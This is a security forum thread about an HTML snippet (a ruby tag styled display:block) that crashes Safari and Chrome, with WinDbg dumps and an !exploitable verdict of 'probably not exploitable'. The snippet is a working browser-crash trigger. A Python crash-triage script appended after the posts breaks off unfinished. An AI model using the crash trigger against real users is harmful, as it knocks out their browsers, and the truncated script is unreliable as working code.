
Thread: Safari 5.1.7 (7534.57.2) and Chrome 26.0.1410.64m

  1. #1

    Safari 5.1.7 (7534.57.2) and Chrome 26.0.1410.64m

    The following code is for Safari 5.1.7 (7534.57.2) and Chrome 26.0.1410.64m

    Code:
    <html><body>
    
    <li>
    <ruby style="display: block;">
    <t:IMG id="tim"></t:IMG>
    </ruby></li>
    
    </body></html>
    ..."vinnu"
    Last edited by "vinnu"; 06-07-2013 at 12:04 PM.

  2. #2
    fb1h2s (Security Researcher)
    I had some issues resolving Chrome symbols, so I couldn't do a proper analysis. But I don't think there is a possibility of making it exploitable. You should report to the vendor and wait a longer time :P before public disclosure :P .

    The villain is "display: block;" for the ruby tag.

    Code:
    <html>
    <body>

    <li>
    <ruby style="display: block;">
    <p>I am fucked :| by style display block</p>
    </ruby>
    </li>

    </body>
    </html>

    0:008> g
    (f90.c14): Access violation - code c0000005 (first chance)
    First chance exceptions are reported before any exception handling.
    This exception may be expected and handled.
    eax=00000000 ebx=02e9f4fc ecx=02e9f568 edx=632476aa esi=02e9f45c edi=02e9f568
    eip=632476de esp=0024e778 ebp=0024e798 iopl=0 nv up ei ng nz ac po cy
    cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010293
    *** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\Program Files\Google\Chrome\Application\27.0.1453.110\chrome.dll -
    chrome_630c0000!ovly_debug_event+0x1678c9:
    632476de 8b400c mov eax,dword ptr [eax+0Ch] ds:0023:0000000c=????????
    0:000> u
    chrome_630c0000!ovly_debug_event+0x1678c9:
    632476de 8b400c mov eax,dword ptr [eax+0Ch]
    632476e1 3bc7 cmp eax,edi
    632476e3 75f5 jne chrome_630c0000!ovly_debug_event+0x1678c5 (632476da)
    632476e5 8b742410 mov esi,dword ptr [esp+10h]
    632476e9 8b4618 mov eax,dword ptr [esi+18h]
    632476ec c1e807 shr eax,7
    632476ef a801 test al,1
    632476f1 0f84b5000000 je chrome_630c0000!ovly_debug_event+0x167997 (632477ac)
    0:000> kb
    ChildEBP RetAddr Args to Child
    WARNING: Stack unwind information not available. Following frames may be wrong.
    0024e798 63247683 02e9f400 02e9f4fc 02e9f4fc chrome_630c0000!ovly_debug_event+0x1678c9
    0024e7b0 63253488 02e9f400 02e9f4fc 02e9f4fc chrome_630c0000!ovly_debug_event+0x16786e
    0024e7c8 63bd8b79 02e9f400 02e9f4fc 02e9f45c chrome_630c0000!ovly_debug_event+0x173673
    0024e7e4 63fa603f 02e9f400 02e9f4fc 02e9f384 chrome_630c0000!ovly_debug_event+0xaf8d64
    0024e800 6358adb9 02e9f400 02e9f4fc 02e9f384 chrome_630c0000!ovly_debug_event+0xec622a
    0024e828 6358ac14 00000000 63288d39 02e9f384 chrome_630c0000!ovly_debug_event+0x4aafa4
    0024e87c 6328776c 02e9f318 00000000 0024e8a8 chrome_630c0000!ovly_debug_event+0x4aadff
    0024e8c8 632848d8 00000001 0024e908 02e9f318 chrome_630c0000!ovly_debug_event+0x1a7957
    0024e970 632842ac 00000001 00000000 02e9f318 chrome_630c0000!ovly_debug_event+0x1a4ac3
    0024e990 63288d39 02e9f318 02e9f1d0 00000001 chrome_630c0000!ovly_debug_event+0x1a4497
    0024e9dc 6328776c 02e9f1d0 00000000 0024ea08 chrome_630c0000!ovly_debug_event+0x1a8f24
    0024ea28 632848d8 00000001 0024ea68 02e9f1d0 chrome_630c0000!ovly_debug_event+0x1a7957
    0024ead0 632842ac 00000001 00000000 02e9f1d0 chrome_630c0000!ovly_debug_event+0x1a4ac3
    0024eaf0 63288d39 02e9f1d0 02e9f010 00000001 chrome_630c0000!ovly_debug_event+0x1a4497
    0024eb3c 6328776c 02e9f010 00000000 0024eb68 chrome_630c0000!ovly_debug_event+0x1a8f24
    0024eb88 632848d8 00000001 0024ebc8 02e9f010 chrome_630c0000!ovly_debug_event+0x1a7957
    0024ec30 632842ac 00000001 00000000 02e9f010 chrome_630c0000!ovly_debug_event+0x1a4ac3
    0024ec50 63283d8d 02e9f010 00000000 01d24680 chrome_630c0000!ovly_debug_event+0x1a4497
    0024ecf8 6328210a 02e97000 01cd8000 02e9f010 chrome_630c0000!ovly_debug_event+0x1a3f78
    0024edbc 63258191 00000001 01cd8040 01cd8000 chrome_630c0000!ovly_debug_event+0x1a22f5
    0:000> u
    chrome_630c0000!ovly_debug_event+0x1678e2:
    632476f7 e81ffafbff call chrome_630c0000!ovly_debug_event+0x127306 (6320711b)
    632476fc 84c0 test al,al
    632476fe 755b jne chrome_630c0000!ovly_debug_event+0x167946 (6324775b)
    63247700 8b742410 mov esi,dword ptr [esp+10h]
    63247704 8b16 mov edx,dword ptr [esi]
    63247706 8b8214010000 mov eax,dword ptr [edx+114h]
    6324770c 8bce mov ecx,esi
    6324770e ffd0 call eax
    0:000> u chrome_630c0000!ovly_debug_event+0x167946
    chrome_630c0000!ovly_debug_event+0x167946:
    6324775b 8b7508 mov esi,dword ptr [ebp+8]
    6324775e 8b4618 mov eax,dword ptr [esi+18h]
    63247761 c1e80a shr eax,0Ah
    63247764 a801 test al,1
    63247766 752f jne chrome_630c0000!ovly_debug_event+0x167982 (63247797)
    63247768 8b4b0c mov ecx,dword ptr [ebx+0Ch]
    6324776b 8b11 mov edx,dword ptr [ecx]
    6324776d 8b421c mov eax,dword ptr [edx+1Ch]
    Hacking Is a Matter of Time Knowledge and Patience

  3. #3
    fb1h2s (Security Researcher)
    0:000> !analyze -v
    FAULTING_IP:
    chrome_630c0000!ovly_debug_event+1678c9
    632476de 8b400c mov eax,dword ptr [eax+0Ch]

    EXCEPTION_RECORD: ffffffff -- (.exr 0xffffffffffffffff)
    ExceptionAddress: 632476de (chrome_630c0000!ovly_debug_event+0x001678c9)
    ExceptionCode: c0000005 (Access violation)
    ExceptionFlags: 00000000
    NumberParameters: 2
    Parameter[0]: 00000000
    Parameter[1]: 0000000c
    Attempt to read from address 0000000c

    FAULTING_THREAD: 00000864

    PROCESS_NAME: chrome.exe

    ADDITIONAL_DEBUG_TEXT:
    Use '!findthebuild' command to search for the target build information.
    If the build information is available, run '!findthebuild -s ; .reload' to set symbol path and load symbols.

    FAULTING_MODULE: 77840000 ntdll

    DEBUG_FLR_IMAGE_TIMESTAMP: 51a5663c

    ERROR_CODE: (NTSTATUS) 0xc0000005 - The instruction at 0x%08lx referenced memory at 0x%08lx. The memory could not be %s.

    EXCEPTION_CODE: (NTSTATUS) 0xc0000005 - The instruction at 0x%08lx referenced memory at 0x%08lx. The memory could not be %s.

    EXCEPTION_PARAMETER1: 00000000

    EXCEPTION_PARAMETER2: 0000000c
    READ_ADDRESS: 0000000c

    FOLLOWUP_IP:
    chrome_630c0000!ovly_debug_event+1678c9
    632476de 8b400c mov eax,dword ptr [eax+0Ch]

    BUGCHECK_STR: APPLICATION_FAULT_NULL_CLASS_PTR_DEREFERENCE_INVALID_POINTER_READ_WRONG_SYMBOLS

    PRIMARY_PROBLEM_CLASS: NULL_CLASS_PTR_DEREFERENCE

    DEFAULT_BUCKET_ID: NULL_CLASS_PTR_DEREFERENCE

    LAST_CONTROL_TRANSFER: from 63247683 to 632476de

    STACK_TEXT:
    WARNING: Stack unwind information not available. Following frames may be wrong.
    0025e398 63247683 02610400 026104fc 026104fc chrome_630c0000!ovly_debug_event+0x1678c9
    0025e3b0 63253488 02610400 026104fc 026104fc chrome_630c0000!ovly_debug_event+0x16786e
    0025e3c8 63bd8b79 02610400 026104fc 0261045c chrome_630c0000!ovly_debug_event+0x173673
    0025e3e4 63fa603f 02610400 026104fc 02610384 chrome_630c0000!ovly_debug_event+0xaf8d64
    0025e400 6358adb9 02610400 026104fc 02610384 chrome_630c0000!ovly_debug_event+0xec622a
    0025e428 6358ac14 00000000 63288d39 02610384 chrome_630c0000!ovly_debug_event+0x4aafa4
    0025e47c 6328776c 02610318 00000000 0025e4a8 chrome_630c0000!ovly_debug_event+0x4aadff
    0025e4c8 632848d8 00000001 0025e508 02610318 chrome_630c0000!ovly_debug_event+0x1a7957
    0025e570 632842ac 00000001 00000000 02610318 chrome_630c0000!ovly_debug_event+0x1a4ac3
    0025e590 63288d39 02610318 026101d0 00000001 chrome_630c0000!ovly_debug_event+0x1a4497
    0025e5dc 6328776c 026101d0 00000000 0025e608 chrome_630c0000!ovly_debug_event+0x1a8f24
    0025e628 632848d8 00000001 0025e668 026101d0 chrome_630c0000!ovly_debug_event+0x1a7957
    0025e6d0 632842ac 00000001 00000000 026101d0 chrome_630c0000!ovly_debug_event+0x1a4ac3
    0025e6f0 63288d39 026101d0 02610010 00000001 chrome_630c0000!ovly_debug_event+0x1a4497
    0025e73c 6328776c 02610010 00000000 0025e768 chrome_630c0000!ovly_debug_event+0x1a8f24
    0025e788 632848d8 00000001 0025e7c8 02610010 chrome_630c0000!ovly_debug_event+0x1a7957
    0025e830 632842ac 00000001 00000000 02610010 chrome_630c0000!ovly_debug_event+0x1a4ac3
    0025e850 63283d8d 02610010 00000000 00ff4680 chrome_630c0000!ovly_debug_event+0x1a4497
    0025e8f8 6328210a 02601000 00fa8000 02610010 chrome_630c0000!ovly_debug_event+0x1a3f78
    0025e9bc 63258191 00000001 00fa8040 00fa8000 chrome_630c0000!ovly_debug_event+0x1a22f5
    0025e9e8 63257e44 02601000 00000000 0025ea70 chrome_630c0000!ovly_debug_event+0x17837c
    0025e9f8 632579b9 00fa8000 00fa8040 02601000 chrome_630c0000!ovly_debug_event+0x17802f
    0025ea70 63256512 00fa8000 63254376 00fa8000 chrome_630c0000!ovly_debug_event+0x177ba4
    0025eae0 6320fbbd 02626fec 02626fc0 02626fc0 chrome_630c0000!ovly_debug_event+0x1766fd
    0025eaf8 6320f3b0 00fa8000 02bd1e54 00000000 chrome_630c0000!ovly_debug_event+0x12fda8
    0025eb14 6320e095 02bd1e00 02bd1e00 631eecaa chrome_630c0000!ovly_debug_event+0x12f59b
    0025eb30 634239c3 45a1cac1 40bbb356 0025eba4 chrome_630c0000!ovly_debug_event+0x12e280
    0025eb8c 634238ee 02629400 00000001 025d62e0 chrome_630c0000!ovly_debug_event+0x343bae
    0025ebb8 632d9268 00faaf00 00000001 00000000 chrome_630c0000!ovly_debug_event+0x343ad9
    0025ebf0 63423792 00000000 00000001 65087cc0 chrome_630c0000!ovly_debug_event+0x1f9453
    0025ec60 63423681 45a1cac1 40bbb356 0025ec84 chrome_630c0000!ovly_debug_event+0x34397d
    0025ec70 634235f4 025d6490 45a1cac1 40bbb356 chrome_630c0000!ovly_debug_event+0x34386c
    0025ec84 63423532 0257da50 45a1cac1 40bbb356 chrome_630c0000!ovly_debug_event+0x3437df
    0025ed54 63422e41 00000000 00000000 0025edd4 chrome_630c0000!ovly_debug_event+0x34371d
    0025ed88 63422d35 00000001 00000000 00000000 chrome_630c0000!ovly_debug_event+0x34302c
    0025eda4 63422a7d 00fb0780 63422dad 0025edc8 chrome_630c0000!ovly_debug_event+0x342f20
    0025edfc 632cc1f6 02be2bb4 00fb0780 00fb0780 chrome_630c0000!ovly_debug_event+0x342c68
    0025eea4 6316d09a 02be2bb4 00fb8a04 02be2bb4 chrome_630c0000!ovly_debug_event+0x1ec3e1
    0025eec8 6316ce35 02be2bb4 00fcbe10 6563c8d4 chrome_630c0000!ovly_debug_event+0x8d285
    0025ef34 6311c9fc 02be2bb4 0025f4f8 0025f418 chrome_630c0000!ovly_debug_event+0x8d020
    0025ef64 63100bdf 02be2bb4 0025f418 0025f008 chrome_630c0000!ovly_debug_event+0x3cbe7
    0025ef74 630f4259 02be2ba0 0025f418 02be2ba4 chrome_630c0000!ovly_debug_event+0x20dca
    0025f008 630f3c12 0025f418 0025f030 0025f418 chrome_630c0000!ovly_debug_event+0x14444
    0025f158 630f5162 0025f418 0025f1c4 00000000 chrome_630c0000!ovly_debug_event+0x13dfd
    0025f184 630f3818 0025f418 64f53bcc 0025f1c4 chrome_630c0000!ovly_debug_event+0x1534d
    0025f1a8 630f3770 64f9e51c 00000000 0025f1e0 chrome_630c0000!ovly_debug_event+0x13a03
    0025f1b8 63125813 00000000 0025f418 00000000 chrome_630c0000!ovly_debug_event+0x1395b
    0025f1e0 631467b1 00fafe40 00000001 00000000 chrome_630c0000!ovly_debug_event+0x459fe
    0025f594 630d990c 0025f5c8 00fafe10 00000000 chrome_630c0000!ovly_debug_event+0x6699c
    0025f5a8 630d9893 0025f5d8 0025f5c8 0025f63c chrome_630c0000!ChromeMain+0xf2db
    0025f614 630ca95d 008aafd8 008a5030 0025f65c chrome_630c0000!ChromeMain+0xf262
    0025f624 630ca64f 00080000 0025f6ec 0025f63c chrome_630c0000!ChromeMain+0x32c
    0025f65c 000a59d3 00080000 0025f6ec 0025f6f4 chrome_630c0000!ChromeMain+0x1e
    0025f6d4 000a8b6e 00080000 0025f6ec 00000000 chrome+0x259d3
    0025f6f8 000a8bd9 00080000 00000000 003e5920 chrome!SetPrinterInfo+0x76a
    0025f740 000c667d 00080000 00000000 003d1976 chrome!SetPrinterInfo+0x7d5
    0025f7d0 77361174 7ffd5000 0025f81c 7789b3f5 chrome!SetPrinterInfo+0x1e279
    0025f7dc 7789b3f5 7ffd5000 77dfc297 00000000 kernel32!BaseThreadInitThunk+0x12
    0025f81c 7789b3c8 000c66d0 7ffd5000 ffffffff ntdll!RtlInitializeExceptionChain+0x63
    0025f834 00000000 000c66d0 7ffd5000 00000000 ntdll!RtlInitializeExceptionChain+0x36


    SYMBOL_STACK_INDEX: 0

    SYMBOL_NAME: chrome!ovly_debug_event+1678c9

    FOLLOWUP_NAME: MachineOwner

    MODULE_NAME: chrome_630c0000

    IMAGE_NAME: chrome.dll

    STACK_COMMAND: ~0s ; kb

    BUCKET_ID: WRONG_SYMBOLS

    FAILURE_BUCKET_ID: NULL_CLASS_PTR_DEREFERENCE_c0000005_chrome.dll!ovly_debug_event

    WATSON_STAGEONE_URL: http://watson.microsoft.com/StageOne...htm?Retriage=1


    0:000> r
    eax=00000000 ebx=026104fc ecx=02610568 edx=632476aa esi=0261045c edi=02610568
    eip=632476de esp=0025e378 ebp=0025e398 iopl=0 nv up ei ng nz ac po cy
    cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010293
    chrome_630c0000!ovly_debug_event+0x1678c9:
    632476de 8b400c mov eax,dword ptr [eax+0Ch] ds:0023:0000000c=????????

  4. #4
    You kinda get a lot of NULL pointers with CSS. This is just one of 'em :-)

    Stack Trace with symbols.
    Code:
    4:064> k
    ChildEBP RetAddr  
    006ae7d8 52df7683 chrome_52c70000!WebCore::RenderBlock::addChildIgnoringAnonymousColumnBlocks+0x34 [c:\b\build\slave\win\build\src\third_party\webkit\source\webcore\rendering\renderblock.cpp @ 810]
    006ae7f0 52e03488 chrome_52c70000!WebCore::RenderBlock::addChildIgnoringContinuation+0x85 [c:\b\build\slave\win\build\src\third_party\webkit\source\webcore\rendering\renderblock.cpp @ 949]
    006ae808 53788b79 chrome_52c70000!WebCore::RenderBlock::addChild+0x57 [c:\b\build\slave\win\build\src\third_party\webkit\source\webcore\rendering\renderblock.cpp @ 941]
    006ae824 53b5603f chrome_52c70000!WebCore::RenderRubyRun::addChild+0x143 [c:\b\build\slave\win\build\src\third_party\webkit\source\webcore\rendering\renderrubyrun.cpp @ 154]
    006ae840 5313adb9 chrome_52c70000!WebCore::RenderRubyAsBlock::addChild+0x185 [c:\b\build\slave\win\build\src\third_party\webkit\source\webcore\rendering\renderruby.cpp @ 280]
    006ae868 5313ac14 chrome_52c70000!WebCore::RenderListItem::updateMarkerLocation+0xb3 [c:\b\build\slave\win\build\src\third_party\webkit\source\webcore\rendering\renderlistitem.cpp @ 268]
    006ae870 52e38d39 chrome_52c70000!WebCore::RenderListItem::layout+0xa [c:\b\build\slave\win\build\src\third_party\webkit\source\webcore\rendering\renderlistitem.cpp @ 282]
    006ae8bc 52e3776c chrome_52c70000!WebCore::RenderBlock::layoutBlockChild+0x2e8 [c:\b\build\slave\win\build\src\third_party\webkit\source\webcore\rendering\renderblock.cpp @ 2557]
    006ae908 52e348d8 chrome_52c70000!WebCore::RenderBlock::layoutBlockChildren+0x24f [c:\b\build\slave\win\build\src\third_party\webkit\source\webcore\rendering\renderblock.cpp @ 2476]
    006ae9b0 52e342ac chrome_52c70000!WebCore::RenderBlock::layoutBlock+0x2c1 [c:\b\build\slave\win\build\src\third_party\webkit\source\webcore\rendering\renderblock.cpp @ 1583]
    006ae9d0 52e38d39 chrome_52c70000!WebCore::RenderBlock::layout+0x39 [c:\b\build\slave\win\build\src\third_party\webkit\source\webcore\rendering\renderblock.cpp @ 1389]
    006aea1c 52e3776c chrome_52c70000!WebCore::RenderBlock::layoutBlockChild+0x2e8 [c:\b\build\slave\win\build\src\third_party\webkit\source\webcore\rendering\renderblock.cpp @ 2557]
    006aea68 52e348d8 chrome_52c70000!WebCore::RenderBlock::layoutBlockChildren+0x24f [c:\b\build\slave\win\build\src\third_party\webkit\source\webcore\rendering\renderblock.cpp @ 2476]
    006aeb10 52e342ac chrome_52c70000!WebCore::RenderBlock::layoutBlock+0x2c1 [c:\b\build\slave\win\build\src\third_party\webkit\source\webcore\rendering\renderblock.cpp @ 1583]
    006aeb30 52e38d39 chrome_52c70000!WebCore::RenderBlock::layout+0x39 [c:\b\build\slave\win\build\src\third_party\webkit\source\webcore\rendering\renderblock.cpp @ 1389]
    006aeb7c 52e3776c chrome_52c70000!WebCore::RenderBlock::layoutBlockChild+0x2e8 [c:\b\build\slave\win\build\src\third_party\webkit\source\webcore\rendering\renderblock.cpp @ 2557]
    006aebc8 52e348d8 chrome_52c70000!WebCore::RenderBlock::layoutBlockChildren+0x24f [c:\b\build\slave\win\build\src\third_party\webkit\source\webcore\rendering\renderblock.cpp @ 2476]
    006aec70 52e342ac chrome_52c70000!WebCore::RenderBlock::layoutBlock+0x2c1 [c:\b\build\slave\win\build\src\third_party\webkit\source\webcore\rendering\renderblock.cpp @ 1583]
    006aec90 52e33d8d chrome_52c70000!WebCore::RenderBlock::layout+0x39 [c:\b\build\slave\win\build\src\third_party\webkit\source\webcore\rendering\renderblock.cpp @ 1389]
    006aed38 52e3210a chrome_52c70000!WebCore::RenderView::layout+0x3c8 [c:\b\build\slave\win\build\src\third_party\webkit\source\webcore\rendering\renderview.cpp @ 276]
    006aedfc 52e08191 chrome_52c70000!WebCore::FrameView::layout+0x782 [c:\b\build\slave\win\build\src\third_party\webkit\source\webcore\page\frameview.cpp @ 1271]
    006aee28 52e07e44 chrome_52c70000!WebCore::Document::implicitClose+0x348 [c:\b\build\slave\win\build\src\third_party\webkit\source\webcore\dom\document.cpp @ 2510]
    006aee38 52e079b9 chrome_52c70000!WebCore::FrameLoader::checkCallImplicitClose+0x4e [c:\b\build\slave\win\build\src\third_party\webkit\source\webcore\loader\frameloader.cpp @ 837]
    006aeeb0 52e06512 chrome_52c70000!WebCore::FrameLoader::checkCompleted+0x186 [c:\b\build\slave\win\build\src\third_party\webkit\source\webcore\loader\frameloader.cpp @ 782]
    006aeeb8 52e04376 chrome_52c70000!WebCore::FrameLoader::finishedParsing+0x3d [c:\b\build\slave\win\build\src\third_party\webkit\source\webcore\loader\frameloader.cpp @ 715]
    006aef14 52e0400f chrome_52c70000!WebCore::Document::finishedParsing+0xe6 [c:\b\build\slave\win\build\src\third_party\webkit\source\webcore\dom\document.cpp @ 4496]
    006aef20 52dbfbbd chrome_52c70000!WebCore::HTMLDocumentParser::attemptToRunDeferredScriptsAndEnd+0x10 [c:\b\build\slave\win\build\src\third_party\webkit\source\webcore\html\parser\htmldocumentparser.cpp @ 764]
    006aef38 52dbf3b0 chrome_52c70000!WebCore::HTMLDocumentParser::prepareToStopParsing+0x110 [c:\b\build\slave\win\build\src\third_party\webkit\source\webcore\html\parser\htmldocumentparser.cpp @ 211]
    006aef54 52dbe095 chrome_52c70000!WebCore::HTMLDocumentParser::finish+0x19a [c:\b\build\slave\win\build\src\third_party\webkit\source\webcore\html\parser\htmldocumentparser.cpp @ 828]
    006aef60 52d9ecaa chrome_52c70000!WebCore::DocumentWriter::end+0x4a [c:\b\build\slave\win\build\src\third_party\webkit\source\webcore\loader\documentwriter.cpp @ 249]
    006aef70 52fd39c3 chrome_52c70000!WebCore::DocumentLoader::finishedLoading+0x128 [c:\b\build\slave\win\build\src\third_party\webkit\source\webcore\loader\documentloader.cpp @ 403]
    006aefcc 52fd38ee chrome_52c70000!WebCore::DocumentLoader::notifyFinished+0x3f [c:\b\build\slave\win\build\src\third_party\webkit\source\webcore\loader\documentloader.cpp @ 354]
    006aeff8 52e89268 chrome_52c70000!WebCore::CachedResource::checkNotify+0x3a [c:\b\build\slave\win\build\src\third_party\webkit\source\webcore\loader\cache\cachedresource.cpp @ 379]
    006af030 52fd3792 chrome_52c70000!WebCore::CachedRawResource::data+0x15a [c:\b\build\slave\win\build\src\third_party\webkit\source\webcore\loader\cache\cachedrawresource.cpp @ 72]
    006af098 52fd3681 chrome_52c70000!WebCore::SubresourceLoader::didFinishLoading+0x97 [c:\b\build\slave\win\build\src\third_party\webkit\source\webcore\loader\subresourceloader.cpp @ 291]
    006af0a8 52fd35f4 chrome_52c70000!WebCore::ResourceLoader::didFinishLoading+0x13 [c:\b\build\slave\win\build\src\third_party\webkit\source\webcore\loader\resourceloader.cpp @ 501]
    006af0bc 52fd3532 chrome_52c70000!WebCore::ResourceHandleInternal::didFinishLoading+0x3d [c:\b\build\slave\win\build\src\third_party\webkit\source\webcore\platform\network\chromium\resourcehandle.cpp @ 166]
    006af18c 52fd2e41 chrome_52c70000!webkit_glue::WebURLLoaderImpl::Context::OnCompletedRequest+0x147 [c:\b\build\slave\win\build\src\webkit\glue\weburlloader_impl.cc @ 721]
    006af1c0 52fd2d35 chrome_52c70000!content::ResourceDispatcher::OnRequestComplete+0x94 [c:\b\build\slave\win\build\src\content\common\resource_dispatcher.cc @ 502]
    006af1dc 52fd2a7d chrome_52c70000!DispatchToMethod<content::ResourceDispatcher,void (__thiscall content::ResourceDispatcher::*)(int,int,bool,std::basic_string<char,std::char_traits<char>,std::allocator<char> > const &,base::TimeTicks const &),int,int,bool,std::basic_string<char,std::char_traits<char>,std::allocator<char> >,base::TimeTicks>+0x1e [c:\b\build\slave\win\build\src\base\tuple.h @ 572]
    006af234 52e7c1f6 chrome_52c70000!ResourceMsg_RequestComplete::Dispatch<content::ResourceDispatcher,content::ResourceDispatcher,void (__thiscall content::ResourceDispatcher::*)(int,int,bool,std::basic_string<char,std::char_traits<char>,std::allocator<char> > const &,base::TimeTicks const &)>+0x4c [c:\b\build\slave\win\build\src\content\common\resource_messages.h @ 261]
    006af2dc 52d1d09a chrome_52c70000!content::ResourceDispatcher::DispatchMessageW+0x1ad [c:\b\build\slave\win\build\src\content\common\resource_dispatcher.cc @ 601]
    006af300 52d1ce35 chrome_52c70000!content::ResourceDispatcher::OnMessageReceived+0xa6 [c:\b\build\slave\win\build\src\content\common\resource_dispatcher.cc @ 293]
    006af36c 52ccc9fc chrome_52c70000!content::ChildThread::OnMessageReceived+0x1c [c:\b\build\slave\win\build\src\content\common\child_thread.cc @ 241]
    006af39c 52cb0bdf chrome_52c70000!IPC::ChannelProxy::Context::OnDispatchMessage+0x93 [c:\b\build\slave\win\build\src\ipc\ipc_channel_proxy.cc @ 267]
    006af3ac 52ca4259 chrome_52c70000!base::internal::Invoker<2,base::internal::BindState<base::internal::RunnableAdapter<void (__thiscall browser_sync::SyncBackendHost::Core::*)(std::basic_string<char,std::char_traits<char>,std::allocator<char> > const &)>,void __cdecl(browser_sync::SyncBackendHost::Core *,std::basic_string<char,std::char_traits<char>,std::allocator<char> > const &),void __cdecl(browser_sync::SyncBackendHost::Core *,std::basic_string<char,std::char_traits<char>,std::allocator<char> >)>,void __cdecl(browser_sync::SyncBackendHost::Core *,std::basic_string<char,std::char_traits<char>,std::allocator<char> > const &)>::Run+0x16 [c:\b\build\slave\win\build\src\base\bind_internal.h @ 1257]
    006af440 52ca3c12 chrome_52c70000!MessageLoop::RunTask+0x341 [c:\b\build\slave\win\build\src\base\message_loop.cc @ 478]
    006af590 52ca5162 chrome_52c70000!MessageLoop::DoWork+0x2ec [c:\b\build\slave\win\build\src\base\message_loop.cc @ 672]
    006af5bc 52ca3818 chrome_52c70000!base::MessagePumpDefault::Run+0xc1 [c:\b\build\slave\win\build\src\base\message_pump_default.cc @ 30]
    [snip] (because of post length restriction)

  5. #5
    41.w4r10r (Garage Addict)
    Reported the same bug 1 month back...

  6. #6
    In Safari 5.1.7 it isn't exploitable.

    Code:
    Access violation - code c0000005 (!!! second chance !!!)
    eax=00000000 ebx=7fb0498c ecx=7fb04a08 edx=69327140 esi=00000000 edi=7fb04a08
    eip=69327172 esp=002dec8c ebp=7fb0498c iopl=0         nv up ei ng nz ac po cy
    cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010293
    *** ERROR: Symbol file could not be found.  Defaulted to export symbols for C:\Program Files\Safari\Apple Application Support\WebKit.dll - 
    WebKit!WKOpenPanelResultListenerGetTypeID+0x643d2:
    69327172 8b460c          mov     eax,dword ptr [esi+0Ch] ds:0023:0000000c=????????
    0:000> !load msec.dll
    0:000> !exploitable -m
    VERSION:1.6.0.0
    IDENTITY:HostMachine\HostUser
    PROCESSOR:X86
    CLASS:USER
    QUALIFIER:USER_PROCESS
    EVENT:DEBUG_EVENT_EXCEPTION
    EXCEPTION_FAULTING_ADDRESS:0xc
    EXCEPTION_CODE:0xC0000005
    EXCEPTION_LEVEL:SECOND_CHANCE
    EXCEPTION_TYPE:STATUS_ACCESS_VIOLATION
    EXCEPTION_SUBTYPE:READ
    FAULTING_INSTRUCTION:69327172 mov eax,dword ptr [esi+0ch]
    BASIC_BLOCK_INSTRUCTION_COUNT:3
    BASIC_BLOCK_INSTRUCTION:69327172 mov eax,dword ptr [esi+0ch]
    BASIC_BLOCK_INSTRUCTION_TAINTED_INPUT_OPERAND:esi
    BASIC_BLOCK_INSTRUCTION:69327175 cmp eax,edi
    BASIC_BLOCK_INSTRUCTION_TAINTED_INPUT_OPERAND:eax
    BASIC_BLOCK_INSTRUCTION:69327177 jne webkit!wkopenpanelresultlistenergettypeid+0x643d0 (69327170)
    BASIC_BLOCK_INSTRUCTION_TAINTED_INPUT_OPERAND:ZeroFlag
    MAJOR_HASH:0xf6e17282
    MINOR_HASH:0x044732ce
    STACK_DEPTH:8
    STACK_FRAME:WebKit!WKOpenPanelResultListenerGetTypeID+0x643d2
    STACK_FRAME:WebKit!WKOpenPanelResultListenerGetTypeID+0x6479d
    STACK_FRAME:WebKit!WKOpenPanelResultListenerGetTypeID+0x646f8
    STACK_FRAME:WebKit!WKOpenPanelResultListenerGetTypeID+0xbc475
    STACK_FRAME:WebKit!WKOpenPanelResultListenerGetTypeID+0xbbe81
    STACK_FRAME:WebKit!WKOpenPanelResultListenerGetTypeID+0xac3dc
    STACK_FRAME:WebKit!WKOpenPanelResultListenerGetTypeID+0xac428
    STACK_FRAME:WebKit!WKOpenPanelResultListenerGetTypeID+0x67226
    INSTRUCTION_ADDRESS:0x0000000069327172
    INVOKING_STACK_FRAME:0
    DESCRIPTION:Read Access Violation near NULL
    SHORT_DESCRIPTION:ReadAVNearNull
    CLASSIFICATION:PROBABLY_NOT_EXPLOITABLE
    BUG_TITLE:Read Access Violation near NULL starting at WebKit!WKOpenPanelResultListenerGetTypeID+0x00000000000643d2 (Hash=0xf6e17282.0x044732ce)
    EXPLANATION:This is a user mode read access violation near null, and is probably not exploitable.
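The verdicts above come from two different WinDbg outputs: the `!analyze -v` fields in post #3 (READ_ADDRESS 0000000c, PRIMARY_PROBLEM_CLASS NULL_CLASS_PTR_DEREFERENCE) and the `!exploitable -m` fields in post #6 (EXCEPTION_FAULTING_ADDRESS 0xc, CLASSIFICATION PROBABLY_NOT_EXPLOITABLE, MAJOR_HASH/MINOR_HASH). When a fuzzing run produces hundreds of such crashes, the useful step is to parse both formats, apply the same near-NULL reasoning the tool applied here, and bucket duplicates by stack hash. The script below is an added example written for this thread, not code from any poster or from Microsoft's !exploitable; the two report strings are constructed samples abbreviated from the output posted above, and the 64 KiB near-NULL threshold is an assumption chosen to match the unmapped low region of a Windows user-mode process.

```python
import re
from collections import defaultdict
from dataclasses import dataclass
from typing import Dict, List, Optional

# Assumption: Windows user mode leaves the lowest 64 KiB unmapped, so a fault
# inside that range is a NULL-plus-offset dereference (like [eax+0Ch] with
# eax == 0 above) rather than a dereference of controllable data.
NEAR_NULL_LIMIT = 0x10000

# Matches "KEY:value" lines from !exploitable -m and "KEY: value" lines from
# !analyze -v. Keys are upper-case, so "ExceptionAddress:" and prompts are skipped.
FIELD_RE = re.compile(r"^\s*([A-Z][A-Z0-9_]*)\s*:\s*(.*?)\s*$")


def parse_fields(text: str) -> Dict[str, List[str]]:
    """Collect every KEY:value line; repeated keys (STACK_FRAME) keep all values."""
    fields: Dict[str, List[str]] = defaultdict(list)
    for line in text.splitlines():
        m = FIELD_RE.match(line)
        if m:
            fields[m.group(1)].append(m.group(2))
    return fields


def _parse_hex(value: Optional[str]) -> Optional[int]:
    """Accept both '0xc' (!exploitable) and '0000000c' (!analyze) spellings."""
    if value is None:
        return None
    m = re.search(r"(?:0x)?([0-9a-fA-F]+)", value)
    return int(m.group(1), 16) if m else None


@dataclass
class CrashSummary:
    fault_address: Optional[int]
    near_null: bool
    classification: str
    description: str
    bucket: str


def summarize(text: str) -> CrashSummary:
    """Reduce one debugger report to the fields a triage queue needs."""
    f = parse_fields(text)

    def first(key: str) -> Optional[str]:
        return f[key][0] if f.get(key) else None

    addr = _parse_hex(first("EXCEPTION_FAULTING_ADDRESS")
                      or first("READ_ADDRESS") or first("WRITE_ADDRESS"))
    near_null = addr is not None and addr < NEAR_NULL_LIMIT

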